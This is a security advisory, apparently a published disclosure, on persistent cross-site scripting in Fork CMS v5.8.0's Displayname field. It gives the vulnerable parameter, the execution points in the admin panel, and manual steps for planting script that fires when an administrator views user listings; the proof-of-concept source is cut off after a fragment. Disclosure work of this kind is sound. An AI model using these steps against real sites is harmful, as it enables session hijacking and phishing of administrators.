+(Copy of the Homepage: https://www.fork-cms.com &
+https://www.fork-cms.com/download )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+persistent web vulnerabilities in the official Fork CMS v5.8.0.
+
+
+Affected Product(s):
+====================
+ForkCMS
+Product: Fork CMS v5.8.0 - Content Management System (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-17: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation web vulnerabilities has been
+discovered in the official Fork CMS v5.8.0 open-source web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent input validation web vulnerabilities are located in the
+`Displayname` input field when using the `Add`, `Edit` or `Register`
+mechanism that forwards the information into the `var` parameter. Remote
+attackers and privileged application user accounts are able to
+inject own malicious persistent script code as the users displayname by
+usage of the registration module (/profiles/register). Privileged
+users with access to the profile or users module are able to exploit the
+issue by a simple inject. The displayname then becomes visible in
+the Admin - Profiles Index on Preview, Edit User/Profile, Delete User
+Interaction and User Index in Listing modules. the var parameter
+does not encode or parse the exisiting injected content and executes it.
+The request method to inject is POST and the attack vector of the
+vulnerability is located on the application-side of the content
+management system. The injection point is located in the registration form
+and the add/edit user function. The execution point of the issue occurs
+in the preview profile, edit user, user index listing and delete
+user message context.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Register
+[+] Add User
+[+] Edit User
+
+Vulnerable Input(s):
+[+] Displayname
+
+Vulnerable Parameter(s):
+[+] var
+
+Affected Module(s):
+[+] Preview Profile
+[+] Edit User
+[+] User Index
+[+] Delete User
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information an steüs below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the fork cms web-application newst version
+2. Move via sitemap or by link to the registration page
+(/modules/profiles/register)
+3. Inject your script code payload html/js to the Displayname input field
+4. Register the account by pushing submit
+5. Activate the link in the account registration email
+Note: Now simple wait until the administrator / privileged user visits
+the panel to execute the code on interaction or preview only
+6. Successful reproduce of the persistent script code injection
+vulnerability!
+
+
+PoC: Vulnerable Source (User Index in Listing -
+https://fork-cms.localhost:8080/private/en/users/index)
+
+test3">